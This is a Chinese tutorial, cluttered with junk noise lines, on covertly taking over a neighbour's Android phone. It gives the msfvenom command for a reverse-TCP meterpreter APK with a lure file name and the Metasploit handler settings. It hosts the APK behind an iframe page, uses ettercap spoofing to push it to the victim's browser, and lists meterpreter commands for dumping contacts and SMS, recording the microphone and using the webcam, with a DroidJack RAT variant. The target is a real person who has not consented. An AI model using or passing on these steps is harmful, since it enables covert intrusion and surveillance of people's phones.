|
* C0 Z1 K4 d6 l0 T. w& \1 `6 T) K9 }
五、msf+ettercap入侵邻居安卓手机
! A- x+ m8 U p/ e
) C7 C3 \& E) ?* q1 A9 P' [
. e! d4 o% h: l 首先启动msf
: {- _7 P5 Z n0 a: C ' c7 p" [8 F' C0 N( g. v
* s* o$ a1 E1 K$ @. Z 先用kali生成一个安卓木马,如下命令: , W7 J7 Z6 w/ ^. O
3 q h9 p5 M+ G
0 Y% M- P5 }& a" D3 v- i" i' I Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) b. f7 S7 O$ K# _+ @1 t
, l1 S, o& g4 ?! Y! C/ r; m4 W, r
3 p& T/ c; M3 t 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
/ W/ {! M$ R' F5 F
9 m( e6 s. W' o, P9 v5 F
8 w8 Q! ]" ?% `: Y! ~ 然后进入msf
# d7 f9 S" Z9 A" [% }0 |
. Z0 e5 q% \1 e. N
. f# _% n, s# F8 [ use exploit/multi/handler
/ ~+ B, N1 v' Z1 S1 A. S: z
6 P/ b, }. x6 m" Z0 o) v
, a$ K6 \* o, K8 E* W( _0 u set payload android/meterpreter/reverse_tcp
- ~ t8 \; w' j
( e) k( {: X* Y' G+ a
/ D* ]& V% w) S& p: M( t$ v% O set LHOST 192.168.0.109 //ip为kaili的ip # q5 `: \& _* U0 K2 x5 i& u
* U, O7 o, X( W" {) V8 Y% d% x
6 V: _# T- B8 C set LPORT 44444 //端口一定要与前面生成的木马的端口一致
8 e0 C1 |0 H* r* A( L k! z# w ( K* P/ D5 c: ?! A$ W
9 P7 Q3 P# T8 s' q( O
Exploit
; U1 N2 x4 X6 l+ X& V0 X8 Y / j5 n- ^- H" h& `* m; i
+ k" f. y6 X- m2 A" j/ ^
9 b+ v( b2 ^% n. \- u/ ?
. O+ ~5 \' ?4 b+ b& w
( N: Y7 G& \1 a3 e+ X- b 下面我们开启ettercap -G
+ t v: W$ `8 }2 G) T
% T- J% }1 S! { I5 t8 ^1 ^; L, {8 l1 P. V- g+ U
我物理IP为
4 S% h0 W8 Q }% J! q* u
) W4 Z! k& R w- u4 Q& L% @- Y$ x/ h" z
4 m; p! s9 G' ^0 A- b+ @
6 w! c1 U ^7 {. e% G. c5 _' l1 l4 b# b5 {, X
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
" ^5 P6 ^% H& \& S$ @2 A5 _4 {
' [, q3 ]/ d. ^& o W9 K9 L" B% c3 [- m0 k
下面我们来设置一下
. S$ q2 R" X* i l 7 Z- t. [) r1 _& V$ \) k
& R |. Z( k7 i! f: u2 B5 P
; _5 S; y8 j% E* h7 l- H w 4 G3 S+ g1 x9 ^, ?
8 t6 U0 C% G; O! z( X 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ! }! |. } s" z$ A$ m
* P" p1 n) @9 a9 D# d9 u6 H% D' L/ K8 w: ?9 M; F" l
! J2 h, x5 ~# Q 0 v+ r: p: U8 G/ L! e. o% v
6 r4 \6 C: \6 n1 b/ |6 |
4 @9 F$ ]8 F+ n1 b, j, t, U" G+ l" j
5 E! `8 o% J0 |" l: }6 Z2 \3 j
- |9 D4 m. W& ?, e; @' N4 X3 X ( m+ ?7 L* p' _4 L; B h. y: O
$ G% N' k3 B7 n1 `1 Q8 v; C% S, p7 ~/ {0 ~/ }
# |! g8 q! j% i/ A # ^5 Z# Z. o. m
6 B5 I- v4 r% y( @
. u6 f- B8 F- h: E! Q0 n y8 V
% u4 {. K! l0 }& \7 f) ~; ^
8 q& [" ~! `; n7 d F' Z) R & ?3 _$ i1 H# u# M4 R) @. H' ~
I2 ?9 q/ D- j9 S" }8 d
! f' M+ z8 k; F7 k
6 @; F! [ J* @& K/ V
: T# f1 }5 M/ M0 {0 F H; C9 S, k8 ~7 O8 s
6 c" r* j4 d7 a3 o E& R8 q2 N
; y0 O. F' `; s* F9 v( @/ M- o$ y' F
1 |: t* o' C" n: Z# s
) r( o& I$ { B1 U# m
4 |' y+ g, q+ `; p
2 w, R5 {/ |1 R* q2 f4 ?
9 p. Q ?3 I" u% i, H: k/ c5 M
( o1 `7 H. `3 g8 j9 |; i; D+ \2 O2 q8 D" J6 ]$ d& J9 x& r$ b
2 E# Y+ @6 `$ s& z( r% z2 R$ g
; C' c2 t3 z$ O( E
) s# ]( n5 \( c3 A6 Z) U% n" L + [. F! R X+ _2 ^; g6 t' \1 W
( w( B9 [; q% R9 d O6 @0 {, w# B! S6 N) e
1 `2 R7 N/ P) @' A: L ~; s
' b, U5 K0 b! T2 E; j1 A) Q$ Q4 I& B. y1 e
下面我们开始攻击
- G5 [* l1 `, H6 w 2 s5 d2 l! S3 v$ P* w- q
B0 }9 p6 R; b% {
1 G: I+ }6 X/ V/ J |
6 F3 w0 y$ n" L; q7 U" n' L, R x4 C- L) ^4 Y% @4 _
! b3 `5 {" u; [/ p$ P. o
4 v( p% _5 ]/ x* R, p# z
; b5 b y$ |2 @+ [; S
9 s% R* c7 a2 o: B+ H
# C8 \6 @ `0 I4 t+ J D; j0 u5 I: y" d/ i4 v
1 M) S- y1 x4 b h
3 f4 g4 k$ K, d: S2 B& H/ h- N
8 k; X: y4 H& }9 e/ g5 ~
: t7 C/ p' h$ I
2 ^# F, x4 D$ J8 ]
8 q i$ E9 |3 s8 a2 p$ G 大概过了5分钟多,发现反弹成功了 + E" f9 `& s N8 E: y
/ @* r; a w: x. q% m
: q7 v( e' h" C! t& }
9 j; |7 y! a! [+ u" {6 T
7 ^: k% @+ {0 ]# Y0 X6 Y$ f( Q; K
1 E$ n& f, ^' [( O, w& J 6 c' ~9 c: C+ S+ W0 ]+ P; f8 C
5 c, d% d, q- Y% D3 ]- C" _
) B2 ]' h9 F% ~4 x: Y
& C0 x, \- H6 ]0 m
" n; P% m/ t: R' V$ }: x
' T- X# p M. o* R" w( g& I2 V( a % t C" L. U0 j: D/ {0 E
/ i0 d% R/ |' N( F4 O
- k) q9 Q: P R. k0 x. }
B# y( B/ @* q. h2 v0 Q0 V5 F Q& t6 m, ]4 _; K
, h9 i0 W; K, o3 A9 T- r# k 6 Q, I3 s, B: q1 }
4 P* J; d2 V f0 m$ v2 W8 {
! W9 q. [3 n/ N
% k' h& J5 F' F- k1 |: d2 c9 P+ n2 l2 O& C( K) v, j
执行命令 3 u! \/ ^8 ^2 b2 e4 g" R F
5 Q. x0 r: d, F( z- _
# o }. @: N) `( W2 R/ d/ C
5 C' ^ X' M" E: F
4 p3 ]: Q3 g, K2 ~2 Z' F. R; G6 v+ h2 t& G$ r T0 u
dump_contacts --》这个是导出电话 8 U1 d: O' Q% ~; c8 Y
; e) c0 n) U* V
& S: e. R2 K5 b4 Y1 t, y4 w/ h dump_sms --》这个是导出信息 7 O/ u# A& E* S' Y
: o1 ^( D4 H2 I6 F) V E t* D
0 \8 |) X0 Y- J; t5 j6 P* Q9 f record_mic Record audio from the default microphone for X seconds
2 O- Z1 R! T6 E, Q( L4 I) ~5 k
9 e# Y1 a5 u, T$ n/ O5 S' ]2 Z7 W$ x
7 b9 E3 _! _3 U5 A. P* q7 I& t webcam_chat Start a video chat / e5 A8 C. v6 f7 V Z$ H1 p6 f) l
) M' l1 }3 l; M& g! B( ~7 i0 O/ C' F" M8 ]0 Y* S0 }+ N6 d3 ]
webcam_list List webcams
x k* i' U% h( k$ g$ ] + H; `+ }' t( w
* K9 I. G' o) ^: R webcam_snap Take a snapshot from the specified webcam
% R* y0 `5 c$ y9 b2 K W" R
I5 M' U" j6 H) R: S8 i* Q
+ L/ e7 l2 U% f, ]/ _9 c3 n webcam_stream   lay a video stream from the specified webcam
. R: J" F4 C9 }
2 k& `0 Q$ f. A5 f4 f( @" S9 N, a
8 K6 u9 j: U; Q" ]1 F3 ? 1 k$ U+ } R8 `8 V# Y6 c; C
; q M3 s: Y& o3 D$ N0 N" X
! a5 C6 N5 F$ L
1 d2 ^. w b, H' U3 i
6 P ^7 B! q3 U- N8 K
# s( g& N5 r6 Q5 \3 B; P/ g6 A 我们打开看一下电话薄,
4 `" [! I0 M+ M! c& n / ~/ c2 Z- Y! `2 _, [4 y+ }7 a
5 J9 s' T# k; o/ }7 ?
- w0 B4 y0 u7 c2 v
- T; r0 d, Y* N8 a
/ p+ j- W* N6 l# p / a$ s4 w! _3 Y( Q; T
9 U% ]% i0 [" N& m* }$ H! P9 I" k1 Y/ [* X
; R4 \# `& m. p& |1 f4 Q
. z: S6 y7 L8 A2 B6 X& G
6 _$ k/ d# Y0 `* d- R7 S
1 X' L, z5 W5 T* d, C1 o4 @0 L 7 w9 f8 J3 z- L! f
u |1 }' r; \) C9 C
! G v" x. p; `0 X
7 F- u% v3 S0 a. J1 y( A7 X, U( z5 Z" i$ q- M2 i) L- B. y* C. t
- Y1 b, c8 ^$ E* Q: m# z2 r
Z4 h7 ?3 G0 F, }; }4 S# U3 [( w) w
我们同时欺骗成DroidJack木马,使用方法如图:
) R; {# g, h9 R) U4 `$ f1 x3 w, v * C' l$ T: V9 u1 A5 z
) [4 y! u( m- J$ T
0 _( c2 x% i. _# o
$ c m5 J8 q) q6 \" F
+ }, K: ?; P, {/ N8 B& f1 h$ I
1 R5 p+ c6 s& p3 F$ D. Z
t2 ~; u" T( {# I! l7 v, L( a" k1 C7 n% Q
( ~( z3 L: W1 k" Q9 Y
' c' y; e4 A9 c! W1 C
) l, ]# G6 p" O! T 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 9 I3 j# d( h+ H0 L, i" T0 K4 S
# I# R6 X4 M5 i; J+ w. n& G6 r( r0 m/ o+ f3 e; Q0 h0 t
1 F6 M* N7 t( d9 f4 n- ^9 _' z1 B
$ b! k/ t6 C3 v# n1 H* u. ~/ l* a# R. M( M2 I0 |& B. f
/ H3 t& T9 R( n6 \
1 b2 `' t2 X6 g, H! Y9 S. q l8 V# [0 N) b8 M
4 B2 E6 t8 _" B0 f + S" y5 v) Y. t9 t1 l: X M& x
# U, R# W4 \+ ^/ ?2 H% r( ^# h! r4 X" G B
 6 C5 h! g6 ]7 d1 B! r2 T4 H
7 c6 H4 [2 Z r4 e5 S4 Q. ^7 T$ z
# L- ?% E+ L- k% a. U6 z
|